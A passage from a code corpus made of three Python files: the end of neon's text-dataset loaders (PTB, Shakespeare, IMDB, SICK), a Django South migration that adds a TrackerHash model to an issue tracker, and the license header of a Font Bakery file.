split (str): "train" or "valid" split of the dataset
dataset (str): 'un2000' for the United Nations dataset or 'eurparl7'
for the European Parliament datset.
subset_pct (float): Percentage of the dataset to use (100 is the full dataset)
"""
def __init__(self, time_steps, path, tokenizer=None,
onehot_input=False, get_prev_target=False, split=None,
dataset='un2000', subset_pct=100):
"""
Load French and English sentence data from file.
"""
assert dataset in ('europarl7', 'un2000'), "invalid dataset"
processed_file = os.path.join(path, dataset + '-' + split + '.h5')
assert os.path.exists(processed_file), "Dataset at '" + processed_file + "' not found"
self.subset_pct = subset_pct
super(TextNMT, self).__init__(time_steps, processed_file, vocab=None, tokenizer=tokenizer,
onehot_input=onehot_input, get_prev_target=get_prev_target,
reverse_target=True)
def _get_data(self, path, tokenizer, vocab):
"""
Tokenizer and vocab are unused but provided to match superclass method signature
"""
def vocab_to_dicts(vocab):
t2i = dict((t, i) for i, t in enumerate(vocab))
i2t = dict((i, t) for i, t in enumerate(vocab))
return t2i, i2t
# get saved processed data
logger.debug("Loading parsed data from %s", path)
with h5py.File(path, 'r') as f:
self.s_vocab = f['s_vocab'][:].tolist()
self.t_vocab = f['t_vocab'][:].tolist()
self.s_token_to_index, self.s_index_to_token = vocab_to_dicts(self.s_vocab)
self.t_token_to_index, self.t_index_to_token = vocab_to_dicts(self.t_vocab)
X = f['X'][:]
y = f['y'][:]
self.nclass = len(self.t_vocab)
# Trim subset and patial minibatch
if self.subset_pct < 100:
X = X[:int(X.shape[0] * self.subset_pct / 100.), :]
y = y[:int(y.shape[0] * self.subset_pct / 100.), :]
logger.debug("subset %d%% of data", self.subset_pct*100)
extra_sentences = X.shape[0] % self.be.bsz
if extra_sentences:
X = X[:-extra_sentences, :]
y = y[:-extra_sentences, :]
logger.debug("removing %d extra sentences", extra_sentences)
self.nbatches = X.shape[0] // self.be.bsz
self.ndata = self.nbatches * self.be.bsz # no leftovers
return X, y
class Shakespeare(Dataset):
"""
Shakespeare data set from http://cs.stanford.edu/people/karpathy/char-rnn.
"""
def __init__(self, timesteps, path='.'):
url = 'http://cs.stanford.edu/people/karpathy/char-rnn'
super(Shakespeare, self).__init__('shakespeare_input.txt',
url,
4573338,
path=path)
self.timesteps = timesteps
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
def gen_iterators(self):
self.load_data()
train_path, valid_path = Text.create_valid_file(self.filepath)
self._data_dict = {}
self._data_dict['train'] = Text(self.timesteps, train_path)
vocab = self._data_dict['train'].vocab
self._data_dict['valid'] = Text(self.timesteps, valid_path, vocab=vocab)
return self._data_dict
class PTB(Dataset):
"""
Penn Treebank data set from http://arxiv.org/pdf/1409.2329v5.pdf
Arguments:
timesteps (int): number of timesteps to embed the data
onehot_input (bool):
tokenizer (str): name of the tokenizer function within this
class to use on the data
"""
def __init__(self, timesteps, path='.',
onehot_input=True,
tokenizer=None,
reverse_target=False,
get_prev_target=False):
url = 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data'
self.filemap = {'train': 5101618,
'test': 449945,
'valid': 399782}
keys = list(self.filemap.keys())
filenames = [self.gen_filename(phase) for phase in keys]
sizes = [self.filemap[phase] for phase in keys]
super(PTB, self).__init__(filenames,
url,
sizes,
path=path)
self.timesteps = timesteps
self.onehot_input = onehot_input
self.tokenizer = tokenizer
if tokenizer is not None:
assert hasattr(self, self.tokenizer)
self.tokenizer_func = getattr(self, self.tokenizer)
else:
self.tokenizer_func = None
self.reverse_target = reverse_target
self.get_prev_target = get_prev_target
@staticmethod
def newline_tokenizer(s):
"""
Tokenizer which breaks on newlines.
Arguments:
s (str): String to tokenize.
Returns:
str: String with "<eos>" in place of newlines.
"""
# replace newlines with '<eos>' so that
# the newlines count as words
return s.replace('\n', '<eos>').split()
@staticmethod
def gen_filename(phase):
"""
Filename generator.
Arguments:
phase(str): Phase
Returns:
string: ptb.<phase>.txt
"""
return 'ptb.%s.txt' % phase
def load_data(self):
self.file_paths = {}
for phase in self.filemap:
fn = self.gen_filename(phase)
size = self.filemap[phase]
self.file_paths[phase] = self.load_zip(fn, size)
return self.file_paths
def gen_iterators(self):
self.load_data()
self._data_dict = {}
self.vocab = None
for phase in ['train', 'test', 'valid']:
file_path = self.file_paths[phase]
get_prev_target = self.get_prev_target if phase is 'train' else False
self._data_dict[phase] = Text(self.timesteps,
file_path,
tokenizer=self.tokenizer_func,
onehot_input=self.onehot_input,
vocab=self.vocab,
reverse_target=self.reverse_target,
get_prev_target=get_prev_target)
if self.vocab is None:
self.vocab = self._data_dict['train'].vocab
return self._data_dict
class HutterPrize(Dataset):
"""
Hutter Prize data set from http://prize.hutter1.net/
"""
def __init__(self, path='.'):
super(HutterPrize, self).__init__('enwik8.zip',
'http://mattmahoney.net/dc',
35012219,
path=path)
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
class IMDB(Dataset):
"""
IMDB data set from http://www.aclweb.org/anthology/P11-1015..
"""
def __init__(self, vocab_size, sentence_length, path='.'):
url = 'https://s3.amazonaws.com/text-datasets'
super(IMDB, self).__init__('imdb.pkl',
url,
33213513,
path=path)
self.vocab_size = vocab_size
self.sentence_length = sentence_length
self.filepath = None
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
def gen_iterators(self):
if self.filepath is None:
self.load_data()
data = pad_data(self.filepath, vocab_size=self.vocab_size,
sentence_length=self.sentence_length)
(X_train, y_train), (X_test, y_test), nclass = data
self._data_dict = {'nclass': nclass}
self._data_dict['train'] = ArrayIterator(X_train, y_train, nclass=2)
self._data_dict['test'] = ArrayIterator(X_test, y_test, nclass=2)
return self._data_dict
class SICK(Dataset):
"""
Semantic Similarity dataset from qcri.org (Semeval 2014).
Arguments:
path (str): path to SICK_data directory
"""
def __init__(self, path='SICK_data/'):
url = 'http://alt.qcri.org/semeval2014/task1/data/uploads/'
self.filemap = {'train': 87341,
'test_annotated': 93443,
'trial': 16446}
keys = list(self.filemap.keys())
self.zip_paths = None
self.file_paths = [self.gen_filename(phase) for phase in keys]
self.sizes = [self.filemap[phase] for phase in keys]
super(SICK, self).__init__(filename=self.file_paths,
url=url,
size=self.sizes,
path=path)
@staticmethod
def gen_zipname(phase):
"""
Zip filename generator.
Arguments:
phase(str): Phase of training/evaluation
Returns:
string: sick_<phase>.zip
"""
return "sick_{}.zip".format(phase)
@staticmethod
def gen_filename(phase):
"""
Filename generator for the extracted zip files.
Arguments:
phase(str): Phase of training/evaluation
Returns:
string: SICK_<phase>.txt
"""
return "SICK_{}.txt".format(phase)
def load_data(self):
"""
Conditional data loader will download and extract zip files if not found locally.
"""
self.zip_paths = {}
for phase in self.filemap:
zn = self.gen_zipname(phase)
size = self.filemap[phase]
self.zip_paths[phase] = self.load_zip(zn, size)
return self.zip_paths
def load_eval_data(self):
"""
Load the SICK semantic-relatedness dataset. Data is a tab-delimited txt file,
in the format: Sentence1\tSentence2\tScore. Data is downloaded and extracted
from zip files if not found in directory specified by self.path.
Returns:
tuple of tuples of np.array: three tuples containing A & B sentences
for train, dev, and text, along with a fourth tuple containing
the scores for each AB pair.
"""
if self.zip_paths is None:
self.load_data()
trainA, trainB, devA, devB, testA, testB = [], [], [], [], [], []
trainS, devS, testS = [], [], []
with open(self.path + self.gen_filename('train'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
trainA.append(text[1])
trainB.append(text[2])
trainS.append(text[3])
with open(self.path + self.gen_filename('trial'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
devA.append(text[1])
devB.append(text[2])
devS.append(text[3])
with open(self.path + self.gen_filename('test_annotated'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
testA.append(text[1])
testB.append(text[2])
testS.append(text[3])
trainS = [float(s) for s in trainS[1:]]
devS = [float(s) for s in devS[1:]]
testS = [float(s) for s in testS[1:]]
return ((np.array(trainA[1:]), np.array(trainB[1:])),
(np.array(devA[1:]), np.array(devB[1:])),
(np.array(testA[1:]), np.array(testB[1:])),
(np.array(trainS), np.array(devS), np.array(testS)))
|
NervanaSystems/neon
|
neon/data/text.py
|
Python
|
apache-2.0
| 22,858
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TrackerHash'
db.create_table(u'issues_trackerhash', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('query_string', self.gf('django.db.models.fields.TextField')()),
('query_hash', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('created', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateField')(auto_now=True, null=True, blank=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'issues', ['TrackerHash'])
def backwards(self, orm):
# Deleting model 'TrackerHash'
db.delete_table(u'issues_trackerhash')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'issues.advancedsearchhash': {
'Meta': {'object_name': 'AdvancedSearchHash'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'search_hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'issues.issue': {
'Meta': {'object_name': 'Issue'},
'actual_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'actual_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assigned_to'", 'null': 'True', 'to': u"orm['auth.User']"}),
'browser': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'browser_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'criticality': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'estimated_time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fixability': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'meta_issues': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modified_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'os': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'os_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'point_of_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'poc'", 'null': 'True', 'to': u"orm['auth.User']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'projected_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'projected_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'r_and_d': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'screen_shot': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'sprint': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sprints.Sprint']", 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.CharField', [], {'default': "'No Summary'", 'max_length': '140'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uri_to_test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'view_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'wireframe': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'issues.issuecomment': {
'Meta': {'object_name': 'IssueComment'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuefieldupdate': {
'Meta': {'object_name': 'IssueFieldUpdate'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'new_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'old_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuehistorical': {
'Meta': {'object_name': 'IssueHistorical'},
'actual_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'actual_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assigned_to_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'browser': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'browser_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_by_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'criticality': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fixability': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']", 'null': 'True', 'blank': 'True'}),
'issue_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'meta_issues': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modified_by_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'os': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'os_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'point_of_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'poc_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'projected_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'projected_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'r_and_d': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'screen_shot': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.CharField', [], {'default': "'No Summary'", 'max_length': '140'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uri_to_test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'view_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'wireframe': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'issues.issuescreenshot': {
'Meta': {'object_name': 'IssueScreenshot'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'screenshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'issues.issuestatusupdate': {
'Meta': {'object_name': 'IssueStatusUpdate'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'new_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'old_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuetoissue': {
'Meta': {'object_name': 'IssueToIssue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_type': ('django.db.models.fields.CharField', [], {'default': "'related'", 'max_length': '255'}),
'primary_issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_issue'", 'to': u"orm['issues.Issue']"}),
'secondary_issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'secondary_issue'", 'to': u"orm['issues.Issue']"})
},
u'issues.issueview': {
'Meta': {'object_name': 'IssueView'},
'hash_val': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"})
},
u'issues.metaissue': {
'Meta': {'object_name': 'MetaIssue'},
'code_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mi_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user_story': ('django.db.models.fields.TextField', [], {})
},
u'issues.pinissue': {
'Meta': {'object_name': 'PinIssue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.projectplanneritem': {
'Meta': {'object_name': 'ProjectPlannerItem'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_type': ('django.db.models.fields.CharField', [], {'default': "'meta_issue'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'x_coordinate': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'y_coordinate': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'issues.projectplanneritemconnection': {
'Meta': {'object_name': 'ProjectPlannerItemConnection'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'source'", 'to': u"orm['issues.ProjectPlannerItem']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'target'", 'to': u"orm['issues.ProjectPlannerItem']"})
},
u'issues.subscriptiontoissue': {
'Meta': {'object_name': 'SubscriptionToIssue'},
'communication_channel': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'communication_type': ('django.db.models.fields.CharField', [], {'default': "'email'", 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.trackerhash': {
'Meta': {'object_name': 'TrackerHash'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'query_hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'projects.project': {
'Meta': {'object_name': 'Project'},
'assumptions': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'business_case': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'code_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'current_phase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'deployment_server': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'deployment_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_requests': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'lead_developer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lead_developer'", 'null': 'True', 'to': u"orm['auth.User']"}),
'logo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'phase_planning_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_planning_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_research_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_research_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'potential_end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'product_owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'product_owner'", 'null': 'True', 'to': u"orm['auth.User']"}),
'project_manager': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'project_manager'", 'null': 'True', 'to': u"orm['auth.User']"}),
'repository_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'scope': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'sprints.sprint': {
'Meta': {'object_name': 'Sprint'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'start': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['issues']
|
tekton/DocuCanvas
|
issues/migrations/0036_auto__add_trackerhash.py
|
Python
|
gpl-3.0
| 25,990
|
#!/usr/bin/env python
# coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
